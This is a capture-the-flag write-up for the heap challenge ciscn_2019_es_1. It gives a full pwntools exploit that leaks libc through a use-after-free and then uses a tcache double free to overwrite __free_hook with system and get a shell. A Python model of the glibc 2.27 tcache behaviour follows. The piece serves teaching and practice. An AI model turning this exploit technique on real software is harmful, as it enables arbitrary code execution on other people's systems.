ciscn_2019_es_1

Author: cnitlrt | Published 2020-02-27 20:15

    The idea: allocate a chunk too large for tcache and free it, so it lands in the unsorted bin; the program still prints a freed entry, so reading its fd through the dangling pointer gives main_arena+96 (x86-64 glibc 2.27). From that, compute the libc base and the addresses of __free_hook and system, then use a tcache double free to overwrite __free_hook with system and free a chunk containing "/bin/sh".

    from pwn import *

    # Remote BUUOJ instance; switch to process() for local debugging.
    p = remote("node3.buuoj.cn", 25789)
    # p = process("./ciscn_2019_es_1")
    # context.log_level = 'debug'

    def add(size, name, call):
        # menu 1: malloc(size) for the name, then a short "call" string
        p.recv()
        p.sendline(b"1")
        p.recv()
        p.sendline(str(size).encode())
        p.recv()
        p.sendline(name)
        p.recv()
        p.send(call)

    def free(idx):
        # menu 3: frees the name chunk but leaves the pointer in place (UAF)
        p.recv()
        p.sendline(b"3")
        p.recv()
        p.sendline(str(idx).encode())

    def show(idx):
        # menu 2: prints the name, even after it has been freed
        p.recv()
        p.sendline(b"2")
        p.recv()
        p.sendline(str(idx).encode())

    # 0: larger than the tcache limit, so freeing it goes to the unsorted bin
    add(0x500, b"aaaa", b"bbbb")
    # 1: holds "/bin/sh", the argument handed to the hooked free() at the end
    add(0x60, b"/bin/sh\x00", b"aaaa")
    # 2: the chunk that will be double-freed into tcache
    add(0x60, b"aaaa", b"bbbb")

    # Leak: the freed unsorted chunk's fd points to main_arena+96 (glibc 2.27, x86-64).
    # puts() stops at the first NUL byte, so only 6 bytes of the pointer come back.
    free(0)
    show(0)
    main_arena = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 96
    log.success("main_arena: " + hex(main_arena))
    # Offsets below are for the Ubuntu 18.04 glibc 2.27 build
    base = main_arena - 0x3ebc40
    log.success("base: " + hex(base))
    free_hook = base + 0x3ed8e8
    log.success("free_hook: " + hex(free_hook))
    sys_addr = base + 0x4f440

    # Take the large chunk back so the unsorted bin is empty before the tcache attack
    add(0x500, b"aaaa", b"bbbb")
    # tcache double free: 2.27 has no double-free check in tcache_put
    free(2)
    free(2)
    # First malloc returns chunk 2; its first qword is the tcache next pointer -> __free_hook
    add(0x60, p64(free_hook), b"a")
    # Second malloc returns chunk 2 again; the third returns __free_hook itself
    add(0x60, p64(free_hook), b"a")
    add(0x60, p64(sys_addr), b"a")
    # free("/bin/sh") now calls system("/bin/sh")
    free(1)
    # gdb.attach(p)
    p.interactive()
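    The mechanism behind the two key steps of the script, as an added example that is not part of the original write-up: a pure-Python model of glibc 2.27's tcache_put/tcache_get for one size class (no double-free check; the next pointer lives in the chunk's first user qword, which is why writing p64(free_hook) into the re-allocated chunk rewrites the free list) plus the leak arithmetic. Heap addresses and the leaked bytes are constructed; the libc offsets are the ones the script uses (Ubuntu 18.04 glibc 2.27). The program's per-entry struct allocations are not modelled.

```python
# Added example, not from the original write-up: model of the tcache double free
# and the unsorted-bin leak arithmetic. Addresses are constructed; libc offsets are
# the write-up's (glibc 2.27, Ubuntu 18.04).
import struct

MASK64 = (1 << 64) - 1
TCACHE_COUNT = 7           # mp_.tcache_count in glibc 2.27


def libc_base_from_leak(leaked, main_arena_off=0x3ebc40, unsorted_off=96):
    """Turn the 6 leaked bytes of a freed unsorted chunk's fd into the libc base.

    puts() stops at the first NUL, so a user-space pointer 0x00007fxxxxxxxxxx
    prints as 6 bytes; pad to 8 before unpacking. On x86-64 glibc 2.27 the fd
    of a chunk in the unsorted bin is &main_arena + 96.
    """
    if len(leaked) != 6 or leaked[-1] != 0x7f:
        raise ValueError("expected a 6-byte user-space pointer ending in 0x7f")
    fd = struct.unpack("<Q", leaked.ljust(8, b"\x00"))[0]
    main_arena = fd - unsorted_off
    base = main_arena - main_arena_off
    if base & 0xfff:
        raise ValueError("libc base not page aligned: wrong libc offsets?")
    return base


class Tcache227:
    """Model of glibc 2.27 tcache_put/tcache_get for a single size class.

    Memory is a dict of 8-byte words. A chunk's first user word is where tcache
    stores 'next', so user data written into a chunk that is still queued in
    tcache becomes the free list's next pointer.
    """

    def __init__(self, free_hook_addr):
        self.mem = {}
        self.head = 0          # tcache->entries[idx]
        self.count = 0         # tcache->counts[idx] (unsigned char)
        self.free_hook_addr = free_hook_addr

    def read(self, addr):
        return self.mem.get(addr, 0)

    def write(self, addr, value):
        self.mem[addr] = value & MASK64

    def free(self, ptr):
        """__libc_free: call __free_hook if set, else tcache_put (no double-free check in 2.27).

        Returns the hook address that would be called as hook(ptr), or None.
        """
        hook = self.read(self.free_hook_addr)
        if hook:
            return hook
        if self.count < TCACHE_COUNT:
            self.write(ptr, self.head)          # e->next = tcache->entries[idx]
            self.head = ptr                     # tcache->entries[idx] = e
            self.count = (self.count + 1) & 0xff
        return None

    def malloc(self):
        """tcache_get: pop the head and follow whatever its next word holds."""
        e = self.head
        if e == 0:
            raise RuntimeError("model only serves requests from tcache")
        self.head = self.read(e)
        self.count = (self.count - 1) & 0xff
        return e


def simulate_free_hook_overwrite(chunk1, chunk2, free_hook, system_addr):
    """Replay the script's free(2); free(2); add; add; add; free(1) sequence.

    Returns the three malloc results and the address free(chunk1) would call.
    """
    h = Tcache227(free_hook)
    h.free(chunk2)
    h.free(chunk2)                           # double free: chunk2 -> chunk2
    a = h.malloc()
    h.write(a, free_hook)                    # add(0x60, p64(free_hook)): sets next ptr
    b = h.malloc()
    h.write(b, free_hook)                    # chunk2 again; list head is now free_hook
    c = h.malloc()
    h.write(c, system_addr)                  # malloc returned __free_hook; write system
    called = h.free(chunk1)                  # free("/bin/sh") -> __free_hook("/bin/sh")
    return a, b, c, called
```

    The page-alignment check in libc_base_from_leak is the quick sanity test to run first when porting this to another libc: if the base is not 0x1000-aligned, the main_arena offset or the +96 bin offset (88 on glibc 2.23) is wrong.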
    

Article link: https://www.haomeiwen.com/subject/opzxhhtx.html